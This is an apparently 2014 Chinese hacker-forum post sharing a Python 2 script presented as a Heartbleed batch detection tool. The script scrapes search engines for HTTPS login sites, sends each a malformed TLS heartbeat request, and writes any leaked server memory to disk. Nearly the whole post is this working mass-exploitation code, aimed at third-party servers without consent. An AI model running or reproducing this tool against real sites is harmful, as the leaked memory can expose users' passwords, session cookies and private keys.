搜索
查看: 650|回复: 0

OpenSSL HeartBleed漏洞批量检测工具

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2014-4-9 16:28:17 | 显示全部楼层 |阅读模式
  1. #-*- coding: gbk -*-
  2. #by  溯溪
  3. import sys
  4. import struct
  5. import socket
  6. import time
  7. import select
  8. import re
  9. import urllib2
  10. from urlparse import urlparse


  11. def h2bin(x):
  12.     return x.replace(' ', '').replace('\n', '').decode('hex')

  13. hello = h2bin('''
  14. 16 03 02 00  dc 01 00 00 d8 03 02 53
  15. 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
  16. bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
  17. 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
  18. 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
  19. c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
  20. c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
  21. c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
  22. c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
  23. 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
  24. 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
  25. 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
  26. 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
  27. 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
  28. 00 0f 00 01 01                                 
  29. ''')

  30. hb = h2bin('''
  31. 18 03 02 00 03
  32. 01 40 00
  33. ''')

  34. def hexdump(s):
  35.     for b in xrange(0, len(s), 16):
  36.         lin = [c for c in s[b : b + 16]]
  37.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
  38.         pdat = &#039;&#039;.join((c if 32 <= ord(c) <= 126 else &#039;.&#039; )for c in lin)
  39.         print &#039;  %04x: %-48s %s&#039; % (b, hxdat, pdat)
  40.     print

  41. def recvall(s, length, timeout=5):
  42.     endtime = time.time() + timeout
  43.     rdata = &#039;&#039;
  44.     remain = length
  45.     while remain > 0:
  46.         rtime = endtime - time.time()
  47.         if rtime < 0:
  48.             return None
  49.         r, w, e = select.select([s], [], [], 5)
  50.         if s in r:
  51.             data = s.recv(remain)
  52.             # EOF?
  53.             if not data:
  54.                 return None
  55.             rdata += data
  56.             remain -= len(data)
  57.     return rdata
  58.         

  59. def recvmsg(s):
  60.     hdr = recvall(s, 5)
  61.     if hdr is None:
  62.         print &#039;Unexpected EOF receiving record header - server closed connection&#039;
  63.         return None, None, None
  64.     typ, ver, ln = struct.unpack(&#039;>BHH&#039;, hdr)
  65.     pay = recvall(s, ln, 10)
  66.     if pay is None:
  67.         print &#039;Unexpected EOF receiving record payload - server closed connection&#039;
  68.         return None, None, None
  69.     print &#039; ... received message: type = %d, ver = %04x, length = %d&#039; % (typ, ver, len(pay))
  70.     return typ, ver, pay

  71. def hit_hb(s,eURL):
  72.     s.send(hb)
  73.     while True:
  74.         typ, ver, pay = recvmsg(s)
  75.         if typ is None:
  76.             print &#039;No heartbeat response received, server likely not vulnerable&#039;
  77.             return False

  78.         if typ == 24:
  79.             print &#039;Received heartbeat response:&#039;
  80.             hexdump(pay)
  81.             if len(pay) > 3:
  82.                 print &#039;WARNING: server returned more data than it should - server is vulnerable!&#039;
  83.                 f=open(eURL,&#039;w&#039;)
  84.                 f.write(pay)
  85.                 f.close()
  86.             else:
  87.                 print &#039;Server processed malformed heartbeat, but did not return any extra data.&#039;
  88.             return True

  89.         if typ == 21:
  90.             print &#039;Received alert:&#039;
  91.             hexdump(pay)
  92.             print &#039;Server returned error, likely not vulnerable&#039;
  93.             return False

  94. def ssltest(eURL):

  95.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  96.     print &#039;Connecting...to %s &#039;%eURL
  97.     sys.stdout.flush()
  98.     s.connect((eURL,443))
  99.     print &#039;Sending Client Hello...&#039;
  100.     sys.stdout.flush()
  101.     s.send(hello)
  102.     print &#039;Waiting for Server Hello...&#039;
  103.     sys.stdout.flush()
  104.     while True:
  105.         typ, ver, pay = recvmsg(s)
  106.         if typ == None:
  107.             print &#039;Server closed connection without sending Server Hello.&#039;
  108.             return
  109.         # Look for server hello done message.
  110.         if typ == 22 and ord(pay[0]) == 0x0E:
  111.             break

  112.     print &#039;Sending heartbeat request...&#039;
  113.     sys.stdout.flush()
  114.     s.send(hb)
  115.     hit_hb(s,eURL)

  116. #proxy_support = urllib2.ProxyHandler({&#039;http&#039;:&#039;http://127.0.0.1:8087&#039;})  #代理服务器
  117. #opener = urllib2.build_opener(proxy_support, urllib2.HTTPHandler)
  118. #urllib2.install_opener(opener)
  119. headers = {&#039;User-Agent&#039;: &#039;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19&#039;}

  120. def main():
  121.     print &#039;开始爬行,请稍等&#039;
  122.     for x in range(0,500,10):
  123.         f=open("link.txt",&#039;a&#039;)
  124.         URL="https://www.google.com/search?q=inurl:https://+登录&start=%d" %x  #Google 搜索
  125.         #URL="http://www.baidu.com/#wd=inurl:https://+登录&pn=%d"%x  #Baidu 搜索
  126.         #URL="https://www.bing.com/search?q=inurl:https://+登录&first=%d"%x  #Bing 搜索
  127.         #URL="http://www.sogou.com/web?query=inurl:https://&page=%d" %x  #Sogou 搜索
  128.         req = urllib2.Request(url = URL,headers = headers)
  129.         content = urllib2.urlopen(req).read()
  130.         a=re.findall(r&#039;(https://.*?/)&#039;,content)
  131.         b=list(set(a))
  132.         for i in b:
  133.             o = urlparse(i)
  134.             f.writelines(o.netloc+&#039;\n&#039;)
  135.         print "已爬完第%s页"%(x/10+1)
  136.         delay=5
  137.         f.close()
  138.    
  139.     f=open("link.txt",&#039;r&#039;)
  140.     for line in f:
  141.         line = line.strip()
  142.         ssltest(line)

  143. if __name__ == &#039;__main__&#039;:
  144.     main()
复制代码
您可以更新记录, 让好友们知道您在做什么...
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表